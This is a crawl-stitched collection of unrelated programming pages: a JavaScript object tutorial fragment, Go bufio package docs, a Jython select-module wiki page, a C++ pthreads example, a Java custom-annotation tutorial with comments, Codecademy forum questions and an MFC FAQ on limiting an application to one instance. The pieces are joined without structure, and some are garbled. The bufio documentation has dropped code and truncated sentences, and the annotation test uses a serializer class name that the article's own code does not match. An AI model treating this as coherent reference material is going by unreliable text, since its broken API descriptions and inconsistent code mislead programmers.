}
this.getCircumference = function(){
var diameter = this.radius*2;
var circumference = diameter*3.14;
return circumference;
}
}
var bigCircle = new Circle(100);
var smallCircle = new Circle(2);
alert(bigCircle.getArea()); // displays 31400
alert(smallCircle.getCircumference()); // displays 12.56
Here, we've encountered another way to define a function. We can use:
functionName = function([parameters]){
// function body
}
In this way, we can create parameters:
functionName = function(parameter1,parameter2,parameter3){
//function body
}
While functions aren't created this way very often, when we're creating objects, they can be useful shortcuts. These processes also help avoid conflicts with function names. For instance, another object can have a different function with the same name, for example
getArea(), without causing a conflict.
208 items | 9 visits
Updated on Jun 21, 16
Created on Apr 01, 08
Category: Computers & Internet
URL: | https://www.diigo.com/list/soulgrind/site-development | CC-MAIN-2020-40 | en | refinedweb |
import "bufio"
Package bufio implements buffered I/O. It wraps an io.Reader or io.Writer object, creating another object (Reader or Writer) that also implements the interface but provides buffering and some help for textual I/O.
const ( // MaxScanTokenSize is the maximum size used to buffer a token // unless the user provides an explicit buffer with Scanner.Buffer. //") ErrBadReadCount = errors.New("bufio.Scanner: Read returned impossible count") )
Errors returned by Scanner..
ScanBytes is a split function for a Scanner that returns each byte as a token..
ScanWords is a split function for a Scanner that returns each space-separated word of text, with surrounding spaces deleted. It will never return an empty string. The definition of space is set by unicode.IsSpace.
ReadWriter stores pointers to a Reader and a Writer. It implements io.ReadWriter.
func NewReadWriter(r *Reader, w *Writer) *ReadWriter
NewReadWriter allocates a new ReadWriter that dispatches to r and w.
Reader implements buffering for an io.Reader object.
NewReader returns a new Reader whose buffer has the default size.
NewReaderSize returns a new Reader whose buffer has at least the specified size. If the argument io.Reader is already a Reader with large enough size, it returns the underlying Reader.
Buffered returns the number of bytes that can be read from the current buffer.
Discard skips the next n bytes, returning the number of bytes discarded.
If Discard skips fewer than n bytes, it also returns an error. If 0 <= n <= b.Buffered(), Discard is guaranteed to succeed without reading from the underlying io.Reader..
Calling Peek prevents a UnreadByte or UnreadRune call from succeeding until the next read operation.
Read reads data into p. It returns the number of bytes read into p. The bytes are taken from at most one Read on the underlying Reader, hence n may be less than len(p). To read exactly len(p) bytes, use io.ReadFull(b, p). At EOF, the count will be zero and err will be io.EOF.
ReadByte reads and returns a single byte. If no byte is available, returns an. Calling UnreadByte after ReadLine will always unread the last byte read (possibly a character belonging to the line end) even if that byte is not part of the line returned by ReadLine.
ReadRune reads a single UTF-8 encoded Unicode character and returns the rune and its size in bytes. If the encoded rune is invalid, it consumes one byte and returns unicode.ReplacementChar (U+FFFD) with a size of 1..
Reset discards any buffered data, resets all state, and switches the buffered reader to read from r.
Size returns the size of the underlying buffer in bytes.
UnreadByte unreads the last byte. Only the most recently read byte can be unread.
UnreadByte returns an error if the most recent method called on the Reader was not a read operation. Notably, Peek is not considered a read operation.
UnreadRune unreads the last rune. If the most recent method called on the Reader was not a ReadRune, UnreadRune returns an error. (In this regard it is stricter than UnreadByte, which will unread the last byte from any read operation.)
WriteTo implements io.WriterTo. This may make multiple calls to the Read method of the underlying Reader. If the underlying reader supports the WriteTo method, this calls the underlying WriteTo without buffering..
Use a Scanner with a custom split function (built by wrapping ScanWords) to validate 32-bit decimal input.
//
Use a Scanner with a custom split function to parse a comma-separated list with an empty final value.
// Comma-separated list; last entry is empty. const input = "1,2,3,4," scanner := bufio.NewScanner(strings.NewReader(input)) // Define a split function that separates on commas. onComma := func(data []byte, atEOF bool) (advance int, token []byte, err error) { for i := 0; i < len(data); i++ { if data[i] == ',' { return i + 1, data[:i], nil } } if !atEOF { return 0, nil, nil } // There is one final token to be delivered, which may be the empty string. // Returning bufio.ErrFinalToken here tells Scan there are no more tokens after this // but does not trigger an error to be returned from Scan itself. return 0, data, bufio.ErrFinalToken } scanner.Split(onComma) // Scan. for scanner.Scan() { fmt.Printf("%q ", scanner.Text()) } if err := scanner.Err(); err != nil { fmt.Fprintln(os.Stderr, "reading input:", err) }
Output:
"1" "2" "3" "4" ""
The simplest use of a Scanner, to read standard input as a set of lines.
scanner := bufio.NewScanner(os.Stdin) for scanner.Scan() { fmt.Println(scanner.Text()) // Println will add back the final '\n' } if err := scanner.Err(); err != nil { fmt.Fprintln(os.Stderr, "reading standard input:", err) }
Use a Scanner to implement a simple word-count utility by scanning the input as a sequence of space-delimited tokens.
// An artificial input source. const input = "Now is the winter of our discontent,\nMade glorious summer by this sun of York.\n" scanner := bufio.NewScanner(strings.NewReader(input)) // Set the split function for the scanning operation. scanner.Split(bufio.ScanWords) // Count the words. count := 0 for scanner.Scan() { count++ } if err := scanner.Err(); err != nil { fmt.Fprintln(os.Stderr, "reading input:", err) } fmt.Printf("%d\n", count)
Output:
15
NewScanner returns a new Scanner to read from r. The split function defaults to ScanLines..
Bytes returns the most recent token generated by a call to Scan. The underlying array may point to data that will be overwritten by a subsequent call to Scan. It does no allocation.
Err returns the first non-EOF error that was encountered by the Scanner..
Split sets the split function for the Scanner. The default split function is ScanLines.
Split panics if it is called after scanning has started..
NewWriter returns a new Writer whose buffer has the default size.
NewWriterSize returns a new Writer whose buffer has at least the specified size. If the argument io.Writer is already a Writer with large enough size, it returns the underlying.
Package bufio imports 5 packages (graph) and is imported by 86550 packages. Updated 2020-09-10. Refresh now. Tools for package owners. | https://godoc.org/bufio | CC-MAIN-2020-40 | en | refinedweb |
New Select Module
Contents
- New Select Module
- Introduction
- Usage notes
- Differences between cpython and jython
- Known Issues
Introduction
There is now select support in the jython distribution, as of version 2.2rc1.
The new module presents an API which is as close as possible to the cpython select module, Jython supports both the
- select.select function
When using the select module, you should be guided by the cpython documentation: any deviation from the behaviour described in that documentation, except for the the considerations mentioned below, should be considered a bug and reported as such.
If you are starting a new project, it is recommended that you use select.poll objects, because
Poll objects are the most efficient mechanism to multiplex sockets on jython, being fairly much a direct mapping to java.nio.channel.Selector objects.
- The select.select function is implemented using a poll object, which means that sockets are de/registered every single time, which is slightly less efficient.
Usage notes
Always close poll objects
When a socket has been registered with a select.poll object, it remains registered until explicitly deregistered. This has the following implications
- Sockets cannot be placed in blocking mode while they are still registered with poll objects
- The reference from the poll object to the socket might interfere with garbage collection
Therefore, it is recommended that you always explicitly close poll objects, using an idiom such as
def my_polling_func(sockets): poll_object = select.poll() try: for s in sockets: poll_object.register(s) finally: poll_object.close()
Closing a poll object cancels all registrations of sockets.
Differences between cpython and jython
Due to fundamental differences in the behaviour of java and C on various platforms, there are differences between the cpython and jython select modules which are not possible to code around. Those differences will be listed here.
Only sockets can be multiplexed, not files or any other IO channel. If you attempt to carry out a select operation on a file in jython, you will get a TypeError, like so
>>> from select import select >>> import os >>> fp = os.open("test.txt") Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: open() takes at least 2 arguments (1 given) >>> fp = os.open("test.txt", os.O_WRONLY|os.O_CREAT) >>> select([fp], [], []) Traceback (most recent call last): File "<stdin>", line 1, in <module> File "C:\jython\Lib\select.py", line 176, in native_select pobj.register(fd, POLLIN) File "C:\jython\Lib\select.py", line 95, in register channel = _getselectable(socket_object) File "C:\jython\Lib\select.py", line 95, in register channel = _getselectable(socket_object) File "C:\jython\Lib\select.py", line 56, in _getselectable raise TypeError("Object '%s' is not watchable" % selectable_object, TypeError: ("Object 'org.python.core.io.FileIO@c4afc4' is not watchable", 39).. Because jython must respect this java restriction, any attempt in jython to pass a socket in blocking mode to either select.select or select.poll().register will fail with an exception.
To summarise
- You must set a socket in non-blocking mode before passing it to the select function or registering it with a poll object
- Any attempt to register a blocking socket for multiplex will raise a select.error exception, with an error code of errno.ESOCKISBLOCKING
- If a socket is currently registered with a select.poll object, an attempt to change it to blocking mode will give rise to the same exception.
A socket can only be placed in blocking mode if it is not registered with a select.poll object.
This issue could be problematic if you want to use a cpython module which relies on select. Such cpython modules do not set their sockets in non-blocking mode before passing them to select.select. In order to support such cpython modules, the following workaround is available.
The cpython-compatible select function
A special version of the select function is provided, to provide cpython compatible select functionality. This function works by
- Recording the blocking mode of all sockets that are passed to the function
- Setting non-blocking mode on all sockets
- Calling the normal jython select.select function (which requires non-blocking sockets)
- Restoring the previously-saved blocking mode for all sockets
- Returning the results of the wrapped select function
This function should only be used when you are working with code that has been written for cpython select, i.e. when the code is passing blocking-sockets to the select function.
How to enable cpython compatible select processing
Here is a code sample which shows how to use the cpython-compatible select function as a replacement for the standard jython select function
from select import cpython_compatible_select as select # Make use of the select function here
WARNING!
- If using the cpython_compatible_select function, you must be aware that the function will modify the blocking mode of your sockets for the duration of the call. If you are carrying out socket operations on that socket in another thread, then those socket operations may fail or raise exceptions.
This function will still not cover all possible uses of select.select by cpython modules. If a cpython module tries to multiplex the sys.stdin or sys.stdout streams, then registration of the channels will fail, because the InputStream and OutputStream representing sys.stdin and sys.stdout are not SelectableChannels.
Known Issues
Receiving urgent data can cause select to lie (Windows implementation)
Bug 1773955 describes the scenario. It is caused by a bug in the Sun Java implementation and there is no known Jython fix. A partial workaround is to call setOOBInline(True) on the jsocket within the Jython socket. This will cause the urgent data to be merged into the regular stream and will keep from confusing select() however you will have to ignore the urgent data at the application level.
Addendum: Support for socket options has been checked into the repo at revision 4494. See NewSocketModule for more details on the options available.
With the new support, you don't need to call the java API on the underlying socket; you can set the OOBINLINE flag using python syntax, like this
mysock.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
But there is still no workaround for the lack of support for TCP Urgent Data on java. | https://wiki.python.org/jython/SelectModule?action=diff&rev1=5&rev2=10 | CC-MAIN-2020-40 | en | refinedweb |
Hi,
In case of projects containing both Java and Scala files it's possible to don't have any warning in case of a full rebuild and get deprecation warnings related to Java when building incrementally. It's esp. problematic when one uses -Xfatal-warnings.
The minimal reproduction:
1. Create two files.
J.java
public class J {
@Deprecated
public static void foo() {}
}
S.scala
class S {
J.foo()
}
2. Make project (for the first time) or Rebuild Project. Everything is okay and the Messages view is even not shown.
3. Now add some blank line in S.scala and start build:
Warning (or obviously Error in case of -Xfatal-warnings):scalac: there was one deprecation warning; re-run with -deprecation for details
4. Then Rebuild Project and, again, there are no warnings.
Currently I use IntelliJ 15.0.2 with Scala plugin 2.0.4 but I saw this previously also with IntelliJ 14.
Just in case - having "Enable warnings" unchecked or explicit -deprecation:false is a workaround but it's not a solution. Also sometimes it's not so simple to just get rid of deprecated code (or it's the responsibility of someone else).
Probably I could just create an issue in your issue tracker, but anyway I'd like to understand what do you do differently when running the full build and when building incrementally. For instance in case of gradle's build from cmd and with -Xfatal-warnings enabled it was never failing - no matter whether building from scratch or incrementally.
Cheers,
Michał
Ah, ok. It looks it's not IntelliJ-specific but it's more something with scalac/sbt. As I checked, the behaviour is exactly the same in case of sbt build from cmd (unlike in case of gradle) and Scala IDE.
Cheers,
Michał
Yes, it seems that scalac emit deprecation warnings if deprecated members are from classpath. If class is compiled in the same compilation run, there are no such warnings. | https://intellij-support.jetbrains.com/hc/en-us/community/posts/206632705-Different-behaviours-when-running-a-full-rebuild-and-building-incrementally | CC-MAIN-2020-40 | en | refinedweb |
Difference between revisions of "RPi Low-level peripherals"
Revision as of 19:22, 20 June R-Pi offers lower-level interfaces intended to connect more directly with chips and subsystem modules. These GPIO (general purpose I/O) signals on the 2x13 header pins include SPI, I²C, serial UART, 3V3 and 5V power. These interfaces are not "plug and play" and require care to avoid miswiring. The pins use a 3V3 logic level and are not tolerant of 5V levels, such as you might find on a 5V powered Arduino. CSI (camera serial interface) can be used to connect the 5 MP camera available. Not yet software-enabled is the flex cable connectors with DSI (display serial interface) and a serial link inside the HDMI connector called CEC. (consumer electronics control)
General Purpose Input/Output [1]. According to this comment b-2013 // Access from ARM Running Linux ();.c * * Raspberry Pi GPIO example using sysfs interface. * Guillermo A. Amaral B. <g@maral.me> * * This file blinks GPIO 4 (P1-07) while reading GPIO 24 (P1_18). */ #include <sys/stat.h> #include <sys/types.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define IN 0 #define OUT 1 #define LOW 0 #define HIGH 1 #define PIN 24 /* P1-18 */ #define POUT 4 /* P1-07 */ static); } static); } static); } static)); } static); } int main(int argc, char *argv[]) { int repeat =); }
bcm2835
This must be done as root. To change to the root user:
sudo -i
You must also get and install the bcm2835 library, which supports GPIO and SPI interfaces. Details and downloads from
// blink.c // // Example program for bcm2835 library // Blinks a pin on an off every 0.5 secs // // After installing bcm2835, you can build this // with something like: // gcc -o blink -l rt blink.c -l bcm2835 // sudo ./blink // // Or you can test it before installing with: // gcc -o blink -l rt -I ../../src ../../src/bcm2835.c blink.c // sudo ./blink // // Author: Mike McCauley (mikem@open.com.au) // Copyright (C) 2011 Mike McCauley // $Id: RF22.h,v 1.21 2012/05/30 01:51:25 mikem Exp $ #include <bcm2835.h> // Blinks on RPi pin GPIO 11 #define PIN RPI_GPIO_P1_11 int main(int argc, char **argv) { // If you call this, it will not actually access the GPIO // Use for testing // bcm2835_set_debug(1); if (!bcm2835_init()) return 1; // Set the pin to be an output bcm2835_gpio_fsel(PIN, BCM2835_GPIO_FSEL_OUTP); // Blink while (1) { // Turn it on bcm2835_gpio_write(PIN, HIGH); // wait a bit delay(500); // turn it off bcm2835_gpio_write(PIN, LOW); // wait a bit delay(500); } return 0; }
Perl
This must be done as root. To change to the root user:
sudo su -
Supports GPIO and SPI interfaces. You must also get and install the bcm2835 library. Details and downloads from You must then get and install the Device::BCM2835 perl library from CPAN
use Device::BCM2835; use strict; # call set_debug(1) to do a non-destructive test on non-RPi hardware #Device::BCM2835::set_debug(1); Device::BCM2835::init() || die "Could not init library"; # Blink pin 11: # Set RPi pin 11 to be an output Device::BCM2835::gpio_fsel(&Device::BCM2835::RPI_GPIO_P1_11, &Device::BCM2835::BCM2835_GPIO_FSEL_OUTP); while (1) { # Turn it on Device::BCM2835::gpio_write(&Device::BCM2835::RPI_GPIO_P1_11, 1); Device::BCM2835::delay(500); # Milliseconds # Turn it off Device::BCM2835::gpio_write(&Device::BCM2835::RPI_GPIO_P1_11, 0); Device::BCM2835::delay(500); # Milliseconds }
Python
RPi.GPIO
The RPi.GPIO module is installed by default in Raspbian. Any RPi.GPIO script must be run as root.
import RPi.GPIO as GPIO # use P1 header pin numbering convention GPIO.setmode(GPIO.BOARD) # Set up the GPIO channels - one input and one output GPIO.setup(11, GPIO.IN) GPIO.setup(12, GPIO.OUT) # Input from pin 11 input_value = GPIO.input(11) # Output to pin 12 GPIO.output(12, GPIO.HIGH) # The same script as above but using BCM GPIO 00..nn numbers GPIO.setmode(GPIO.BCM) GPIO.setup(17, GPIO.IN) GPIO.setup(18, GPIO.OUT) input_value = GPIO.input(17) GPIO.output(18, GPIO.HIGH)
Scratch can be used to control the GPIO pins using a background Python handler available from
Pridopia Scratch Rs-Pi-GPIO driver
Scratch control GPIO (use GPIO number not P1 pin number can support GPIO 28,29,30,31)
This uses the Java library available at. It does not depend on (or use) the wiringPi driver, but uses the same numbering scheme. Instead it uses the default driver under /sys/class/gpio that ships with the distro, so it works out of the box. Any Java application that controls GPIO must be run as root.
Export creates a new folder for the exported pin, and creates files for each of its control functions (i.e. active_low, direction, edge, power, subsystem, uevent, and value). Upon creation, the control files can be read by all users (not just root), but can only be written to by user root, the file's owner. Nevertheless, once created, it is possible to allow users other than root, to also write inputs to the control files, by changing the ownership or permissions of these files. Changes to the file's ownership or permissions must initially be done as root, as their owner and group is set to root upon creation. Typically you might change the owner to be the (non root) user controlling the GPIO, or you might add write permission, and change the group ownership to one of which the user controlling the GPIO is a member. By such means, using only packages provided in the recommended rasbian distribution, it is possible for Python CGI scripts, which are typically run as user nobody, to be used for control of the GPIO over the internet from a browser at a remote location.
#!/bin/sh # GPIO numbers should be from this list # 0, 1, 4, 7, 8, 9, 10, 11, 14, 15, 17, 18, 21, 22, 23, 24, 25 # Note that the GPIO numbers that you program here refer to the pins # of the BCM2835 and *not* the numbers on the pin header. # So, if you want to activate GPIO7 on the header you should be # using GPIO4 in this script. Likewise if you want to activate GPIO0 # on the header you should be using GPIO17 here. #
wiringPi - gpio utility
You need the wiringPi library from. Once installed, there is a new command gpio which can be used as a non-root user to control the GPIO pins.
The man page
man gpio
has
Whilst bwbasic can accommodate shell commands, and we can store a set of these commands (eg. to export a number of GPIO pins at the outset) as numbered statements in a file that can be loaded with the basic command LOAD "filename" and RUN (ref 2), the shell commands have to run as a separate file, as they cannot be run from within, as part of a basic:
SPI
There is | https://elinux.org/index.php?title=RPi_Low-level_peripherals&diff=382861 | CC-MAIN-2020-40 | en | refinedweb |
Creating a Custom Annotation in Java
Last modified: December 14, 2019
1. Introduction
Java annotations are a mechanism for adding metadata information to our source code. They are a powerful part of Java, and were added in JDK5. Annotations offer an alternative to the use of XML descriptors and marker interfaces.
Although we can attach them to packages, classes, interfaces, methods, and fields, annotations by themselves have no effect on the execution of a program.
In this tutorial, we're going to focus on how to create custom annotations, and how to process them. We can read more about annotations in our article on annotation basics.
Further reading:
Abstract Classes in Java
Marker Interfaces in Java
2. Creating Custom Annotations
We're going to create three custom annotations with the goal of serializing an object into a JSON string.
We'll use the first one on the class level, to indicate to the compiler that our object can be serialized. Next, we'll apply the second one to the fields that we want to include in the JSON string.
Finally, we'll use the third annotation on the method level, to specify the method that we'll use to initialize our object.
2.1. Class Level Annotation Example
The first step toward creating a custom annotation is to declare it using the @interface keyword:
public @interface JsonSerializable { }
The next step is to add meta-annotations to specify the scope and the target of our custom annotation:
@Retention(RetentionPolicy.RUNTIME) @Target(ElementType.Type) public @interface JsonSerializable { }
As we can see, our first annotation has runtime visibility, and we can apply it to types (classes). Moreover, it has no methods, and thus serves as a simple marker to mark classes that can be serialized into JSON.
2.2. Field Level Annotation Example
In the same fashion, we create our second annotation, to mark the fields that we are going to include in the generated JSON:
@Retention(RetentionPolicy.RUNTIME) @Target(ElementType.FIELD) public @interface JsonElement { public String key() default ""; }
The annotation declares one String parameter with the name “key” and an empty string as the default value.
When creating custom annotations with methods, we should be aware that these methods must have no parameters, and cannot throw an exception. Also, the return types are restricted to primitives, String, Class, enums, annotations, and arrays of these types, and the default value cannot be null.
2.3. Method Level Annotation Example
Let's imagine that, before serializing an object to a JSON string, we want to execute some method to initialize an object. For that reason, we're going to create an annotation to mark this method:
@Retention(RetentionPolicy.RUNTIME) @Target(ElementType.METHOD) public @interface Init { }
We declared a public annotation with runtime visibility that we can apply to our classes' methods.
2.4. Applying Annotations
Now, let's see how we can use our custom annotations. For instance, let's imagine that we have an object of type Person that we want to serialize into a JSON string. This type has a method that capitalizes the first letter of the first and last names. We'll want to call this method before serializing the object:
@JsonSerializable public class Person { @JsonElement private String firstName; @JsonElement private String lastName; @JsonElement(key = "personAge") private String age; private String address; @Init private void initNames() { this.firstName = this.firstName.substring(0, 1).toUpperCase() + this.firstName.substring(1); this.lastName = this.lastName.substring(0, 1).toUpperCase() + this.lastName.substring(1); } // Standard getters and setters }
By using our custom annotations, we're indicating that we can serialize a Person object to a JSON string. In addition, the output should contain only the firstName, lastName, and age fields of that object. Moreover, we want the initNames() method to be called before serialization.
By setting the key parameter of the @JsonElement annotation to “personAge”, we are indicating that we'll use this name as the identifier for the field in the JSON output.
For the sake of demonstration, we made initNames() private, so we can't initialize our object by calling it manually, and our constructors aren't using it either.
3. Processing Annotations
So far, we have seen how to create custom annotations and how to use them to decorate the Person class. Now, we're going to see how to take advantage of them by using Java's Reflection API.
The first step will be to check whether our object is null or not, as well as whether its type has the @JsonSerializable annotation or not:
private void checkIfSerializable(Object object) { if (Objects.isNull(object)) { throw new JsonSerializationException("The object to serialize is null"); } Class<?> clazz = object.getClass(); if (!clazz.isAnnotationPresent(JsonSerializable.class)) { throw new JsonSerializationException("The class " + clazz.getSimpleName() + " is not annotated with JsonSerializable"); } }
Then, we look for any method with @Init annotation, and we execute it to initialize our object's fields:
private void initializeObject(Object object) throws Exception { Class<?> clazz = object.getClass(); for (Method method : clazz.getDeclaredMethods()) { if (method.isAnnotationPresent(Init.class)) { method.setAccessible(true); method.invoke(object); } } }
The call of method.setAccessible(true) allows us to execute the private initNames() method.
After the initialization, we iterate over our object's fields, retrieve the key and value of JSON elements, and put them in a map. Then, we create the JSON string from the map:
private String getJsonString(Object object) throws Exception { Class<?> clazz = object.getClass(); Map<String, String> jsonElementsMap = new HashMap<>(); for (Field field : clazz.getDeclaredFields()) { field.setAccessible(true); if (field.isAnnotationPresent(JsonElement.class)) { jsonElementsMap.put(getKey(field), (String) field.get(object)); } } String jsonString = jsonElementsMap.entrySet() .stream() .map(entry -> "\"" + entry.getKey() + "\":\"" + entry.getValue() + "\"") .collect(Collectors.joining(",")); return "{" + jsonString + "}"; }
Again, we used field.setAccessible(true) because the Person object's fields are private.
Our JSON serializer class combines all the above steps:
public class ObjectToJsonConverter { public String convertToJson(Object object) throws JsonSerializationException { try { checkIfSerializable(object); initializeObject(object); return getJsonString(object); } catch (Exception e) { throw new JsonSerializationException(e.getMessage()); } } }
Finally, we run a unit test to validate that our object was serialized as defined by our custom annotations:
@Test public void givenObjectSerializedThenTrueReturned() throws JsonSerializationException { Person person = new Person("soufiane", "cheouati", "34"); JsonSerializer serializer = new JsonSerializer(); String jsonString = serializer.serialize(person); assertEquals( "{\"personAge\":\"34\",\"firstName\":\"Soufiane\",\"lastName\":\"Cheouati\"}", jsonString); }
4. Conclusion
In this article, we saw how to create different types of custom annotations. Then we discussed how to use them to decorate our objects. Finally, we looked at how to process them using Java's Reflection API.
As always, the complete code is available over on GitHub.
In person class
@Init
private void initNames()
but later discussion
we made initializeNames() private
Thanks Ron! Fixed.
Hi. Thanks for this tutorial! It looks like the ObjectToJsonConverter class was renamed to JsonSerializer in the unit test.
It looks like the JsonSerializerUnitTest class has tests for the ObjectToJsonConverter class.
ObjectToJsonConverter:
JsonSerializerUnitTest:
please share the definition of getKey(field) method. | https://www.baeldung.com/java-custom-annotation | CC-MAIN-2020-40 | en | refinedweb |
In this C++ tutorial, let us discuss multithreading concepts and creation or termination of threads with an example program.
Introduction of Multithreading
Multithreading is a specific form of multitasking that allows your computer to run two or more programs concurrently. There are two types of multitasking such as
- process-based multitasking
- thread-based multitasking
The Process-based multitasking controls the concurrent execution of programs, whereas the Thread-based multitasking deals with the concurrent execution of parts of the same program.
In general, C++ does not hold any built-in functions for multithreaded applications. Instead, it relies entirely upon the operating system to provide that feature.
Creation of Thread
The routine given below is used to create a POSIX thread.
#include <pthread.h> pthread_create (thread, attr, start_routine, arg)
Here, pthread_create creates a new thread and makes it executable. This routine can be called several numbers of times from anywhere within the code.
Description of parameters in the above-specified routine
- thread
An opaque, unique identifier for the new thread returned by the subroutine.
- attr
An opaque attribute object that may be used to set thread attributes. You can specify a thread attributes object or NULL for the default values.
- start_routine
The C++ routine that the thread will execute once it is created.
- arg
A single argument that may be passed to start_routine. It must be passed by reference as a pointer cast of type void. NULL may be used if no argument is to be passed.
Termination of Threads
The routine given below is used to terminate a POSIX thread
#include <pthread.h> pthread_exit (status)
Here pthread_exit is used to explicitly exit a thread. Typically, the pthread_exit() routine is called after a thread has completed its work and is no longer required to exist.
C++ Program for creation and termination of threads
This following example code creates 5 threads with the pthread_create() routine and then terminates it using pthread_exit().
#include <iostream> #include <cstdlib> #include <pthread.h> using namespace std; #define NUM_THREADS 5 void *PrintHello(void *threadid) { long tid; tid = (long)threadid; cout << "Hello World! Thread ID, " << tid << endl; pthread_exit(NULL); } int main () { pthread_t threads[NUM_THREADS]; int rc; int i; for( i = 0; i < NUM_THREADS; i++ ) { cout << "main() : creating thread, " << i << endl; rc = pthread_create(&threads[i], NULL, PrintHello, (void *)i); if (rc) { cout << "Error:unable to create thread," << rc << endl; exit(-1); } } pthread_exit(NULL); }
Output
main() : creating thread, 0 main() : creating thread, 1 main() : creating thread, 2 main() : creating thread, 3 main() : creating thread, 4 Hello World! Thread ID, 0 Hello World! Thread ID, 1 Hello World! Thread ID, 2 Hello World! Thread ID, 3 Hello World! Thread ID, 4 | https://www.codeatglance.com/cpp-multithreading/ | CC-MAIN-2020-40 | en | refinedweb |
First of all, I’d like to apologize if there is any issue with my question.
I don’t really understand why my code is printing out the correct position.
When I call Console.WriteLine($“Song number {index} is rated three stars”); shouldn’t the code need {position} instead of {index}?
I don’t undertsand why index has 1 being added to it…
using System; namespace BuiltInMethods { class Program { static void Main(string[] args) { string[] summerStrut; summerStrut = new string[] { "Juice", "Missing U", "Raspberry Beret", "New York Groove", "Make Me Feel", "Rebel Rebel", "Despacito", "Los Angeles" }; int[] ratings = { 5, 4, 4, 3, 3, 5, 5, 4 }; int index = (Array.IndexOf(ratings, 3)); int position = index++; int threeStars = Array.Find(ratings, three => three == 3); Console.WriteLine($"Song number {index} is rated three stars"); } } } | https://discuss.codecademy.com/t/having-some-issues-with-and-printing/475736 | CC-MAIN-2020-40 | en | refinedweb |
Hi guys, i did solve these two problems myself without googling.
I have little confusion on nested loops here:
1st code:
def exponents(bases, powers): new_list = [] for i in range(len(bases)): for j in range(len(powers)): new_list.append(bases[i] ** powers[j]) return new_list print(exponents([2,3,4],[1,2,3]))
2nd code:
def larger_sum(lst1, lst2): sum1 = 0 sum2 = 0 for i in range(len(lst1)): sum1 += lst1[i] for j in range(len(lst2)): sum2 += lst2[j] if sum1 > sum2: return lst1 elif sum1 == sum2: return lst1 else: return lst2 print(larger_sum([1, 9, 5], [2, 3, 7]))
In the second code, i was not getting the solution due to using of nested loops, I have little doubts that, in the second code too, there are two parameter lists. But , why don’t we use nested loop here, while in the 1st code, we used nested loop as I need to multiply the base index to the power index.
Somebody, please clear my doubts.
I will be very thankful to you.
Thanks
New coder | https://discuss.codecademy.com/t/nested-loop-confusion/491566 | CC-MAIN-2020-40 | en | refinedweb |
13.2. Application Specific Questions
13.2.1. How can I create an application that is initially maximized?
For new applications, this can be done with AppWizard during Step 4. During Step 4, choose Advanced..., and then select the Main Frame tab. Check the Maximized option.
For an MDI application, in the CWinApp::InitInstance() function, set CWinApp::m_nCmdShow to SW_SHOWMAXIMIZED before calling pMainFrame->ShowWindow(m_nCmdShow). In an application generated by AppWizard, the code is as follows:
CMainFrame* pMainFrame = new CMainFrame;
if (!pMainFrame->LoadFrame(IDR_MAINFRAME))
return FALSE;
m_nCmdShow = SW_SHOWMAXIMIZED; // ADD THIS LINE!
pMainFrame->ShowWindow(m_nCmdShow);
pMainFrame->UpdateWindow();
m_pMainWnd = pMainFrame;
In an SDI application, in the CWinApp::InitInstance() function, set CWinApp::m_nCmdShow to SW_SHOWMAXIMIZED before calling OnFileNew().For example, in an application generated by AppWizard, the code is as follows:
- m_nCmdShow = SW_SHOWMAXIMIZED;
-
- // create a new (empty) document
- OnFileNew();
MSVC Knowledge Base, 6/4/95
13.2.2. How do I limit my MFC application to one instance?
Look at the Microsoft sample ONETIME.EXE, (MSDN CD or). In Brief:
- const char* MyMainWndClassName = "MyMainWndXQW";
- BOOL CMyApp::InitApplication()
- {
- //Call base class. Default version does nothing.
- CWinApp::InitApplication();
-
- WNDCLASS wndcls;
-
- // start with NULL defaults
- memset(&wndcls, 0, sizeof(WNDCLASS));
-
- // Get class information for default window class.
- ::GetClassInfo(AfxGetInstanceHandle(),
- "AfxFrameOrView",
- &wndcls);
-
- // Substitute unique class name for new class
- wndcls.lpszClassName = MyMainWndClassName;
-
- //Register new class and return the result code
- return ::RegisterClass(&wndcls);
- }
- BOOL CMyApp::FirstInstance()
{
CWnd *PrevCWnd, *ChildCWnd;
- // Determine if another window with our class name exists...
PrevCWnd = CWnd::FindWindow(MyMainWndClassName, NULL);
if (PrevCWnd != NULL)
{
- // if so, does it have any popups?
ChildCWnd=PrevCWnd->GetLastActivePopup();
- // Bring the main window to the top
PrevCWnd->BringWindowToTop();
- // If iconic, restore the main window
if (PrevCWnd->IsIconic())
PrevCWnd->ShowWindow(SW_RESTORE);
- // If there are popups, bring them along too!
if (PrevCWnd != ChildCWnd)
ChildCWnd->BringWindowToTop();
- // Return FALSE. This isn't the first instance
// and we are done activating the previous one.
return FALSE;
}
else
// First instance. Proceed as normal.
return TRUE;
}
- CMyApp::InitInstance()
{
- if (!FirstInstance())
return FALSE;
//...
}
Niels Ull Jacobsen ([email protected]), programmer.tools, 6/19/95
See also MS Knowledge base article Q124134 ( "Allowing Only One Application Instance on Win32s") and Advanced Windows NT , chapter 7, "Prohibiting Multiple Instances of an Application from Running: The MultInst Sample Application" (available on the MSDN).
Niels Ull Jacobsen ([email protected]), email, 8/8/95
- update - these were posted to mfc-l:
I have each InitApplication() create a semaphore. If GetLastError() returns ERROR_ALREADY_EXISTS then I know that some other application is already running and has gotten that far so I bail.
- Yourapp::InitInstance()
- {
- hMutexOneInstance = CreateMutex(NULL, TRUE,
- _T("PreventSecondInstance"));
- if(GetLastError() == ERROR_ALREADY_EXISTS)
- bFound = TRUE;
- if(hMutexOneInstance)
- ReleaseMutex(hMutexOneInstance);
- return (bFound == TRUE) ? FALSE : TRUE;
- }
There is a nice section in Jeffrey Richter's book Advanced Windows NT about this. Essentially, it uses shared data segments between processes.
- Step1:
- =======
- In your main file, add:
#pragma data_seg(".SharedData")
LONG nUsageCount = -1;
#pragma data_seg()
-
- Step 2 :
- =======
- In your Application's InitInstance(), call:
- InterlockedIncrement ( &nUsageCount );
-
- This function returns the incremented value of the variable. If it is non-zero, you know that you are not the first App.
- In your Application's ExitInstance() call:
- InterlockedDecrement( &nUsageCount );
-
- Step3:
- =======
- In your DEF file, have the following lines: ( Note that the segment name you give here should match the one in the application's main file. )
- SEGMENTS
- .SharedData shared
